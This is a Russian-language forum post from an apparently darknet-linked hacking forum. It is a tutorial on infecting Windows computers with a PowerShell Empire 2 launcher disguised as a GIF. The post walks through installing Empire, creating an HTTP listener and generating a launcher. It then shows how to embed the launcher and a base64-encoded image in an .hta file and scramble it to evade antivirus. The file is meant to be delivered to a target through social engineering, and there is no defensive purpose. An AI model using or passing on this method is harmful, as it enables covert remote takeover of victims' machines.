Заражение с помощью GIF

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

Morty

VIP

Morty

VIP
26 Окт 2017
537
113
В ходе работы будем использовать PowerShell Empire 2 поэтому я частично затрону вопрос установки и использования его в нашей связке.

Как установить PowerShell Empire 2?
Если у вас уже есть данная утилита, то можно переходить к следующей главе. Это небольшая инструкция для начинающих. Для начала необходимо скопировать данную утилиту с репозитария
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
(НЕ РЕКЛАМА). Я буду выделять команды в своем терминале Kali Linux:
[SRC]git clone https://github.com/EmpireProject/Empire.git[/SRC]
1b43e37208b066ecc82e515fb1adda65.png
Далее необходимо провести установку. Далее необходимо перейти в папку Empire. Выполняем несколько команд.
[SRC]cd Empire/
cd setup
./install.sh[/SRC]
0334f5cab9b77a4908211f5db0aaf70b.png
Далее необходимо вернуться в директорию и запустить файл. Для этого выполняем такие команды, после чего произойдет запуск утилиты:
[SRC]cd ..
./empire[/SRC]
d9573bd084335c103d8583f178257ccd.png
Как создать исполняемую команду в PowerShell Empire 2?
Чтобы получить доступ над нашей целью необходимо чтобы сгенерированный код был запущенный в командной строке. Сначала попробуем провести атаку, напрямую выполнив команду в Windows 10, а далее будем использовать метод, который позволит хорошо скрыть наш код.

Для начала необходимо запустить команду и проверить активных "слушателей":
[SRC]liseners[/SRC]
f548a76d7b7c7fba97b145f2f1be7a44.png
Далее создадим учетную запись, которая позволит получить активные профиль для дальнейшего тестирования, для этого выполняем команды:
[SRC]uselistener http
execute
listeners //проверяем наш созданный профиль[/SRC]

5834ee4e91c13add27d701069f399ef2.png
Далее необходимо генерировать код для запуска для этого выполняем команду:

[SRC]launcher powershell http[/SRC]
7a11d2ef13a5bc095dbc96a0bee3ca35.png
После этого копируем полученный код и запускаем его в командной строке на ОС нашей цели. Я для теста использовал Windows 10. После запуска на винде процесс обрабатывается и закрывается, а мы получаем сессию. После этого в терминале появиться такое окно:
03bd9bdf006fd01f6bf5b7aead7cb509.png
Маскируем наш код в GIF картинку
Для этого нам нужен код, которые мы генерировали в предыдущих шагах. Рассмотрим выполнения этой процедуры в несколько шагов.

Хочу отметить сразу, что тестирование проводилось на нескольких машинах Windows 7 и Windows 10 и все процедуры были успешными и удавалось получать доступ к нашей цели. Способ очень эффективный, так как не обнаруживаеться многими антивирусами.

Шаг 1: Подготавливаем наш скрипт
Скачать и посмотреть можно по этой ссылке. Далее необходимо добавить себе в блокнот. После этого необходимо вставить код из PowerShell Empire 2 в 37 строчку, как показано на скриншоте:
2845aed89b38e1bd02503950b1176362.png
Шаг 2: Конвертируем GIF-ку и добавляем в скрипт
Для этого можно воспользоваться этим
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
(НЕ РЕКЛАМА). Добавляем любую картинку в формате .gif и нажимаем convert to Base64.
16f3dfe2ae42d2065c78e18471b08ea7.png
Далее необходимо добавить полученный код в наш скрипт, который мы использовали в первом шаге. Добавляем в 17 строку, как на скриншоте:
a489264daafd4f8d63dd3d0beabbbf1f.png
Шаг 3: скрываем вредоносный файл от антивирусов
Сделаем это с помощью программы
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
(НЕ РЕКЛАМА). Скачиваем, распаковываем, запускаем и выбираем операцию "Scramble" во вкладке "Script in "Before"", а в меню "Scripts"-"Encode script", более детально можно увидеть на скриншоте:
eae77de60ffc10c3d5a207b0c7caba62.png
После этого остается скопировать полученный результат в текстовый файл с форматом .hta. После запуска на компьютере нашей цели появиться гифка, а у нас успешная сессия. Способ очень интересный и может использоваться на практике.
3ab1fc43a06ab4983badc55f1c68519d.png
Заключение
Таким образом, этот способ можно использовать с применением СИ. Относительно быстро и просто можно получить доступ над целевым компьютером. Используйте с умом да и будет счастье.
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя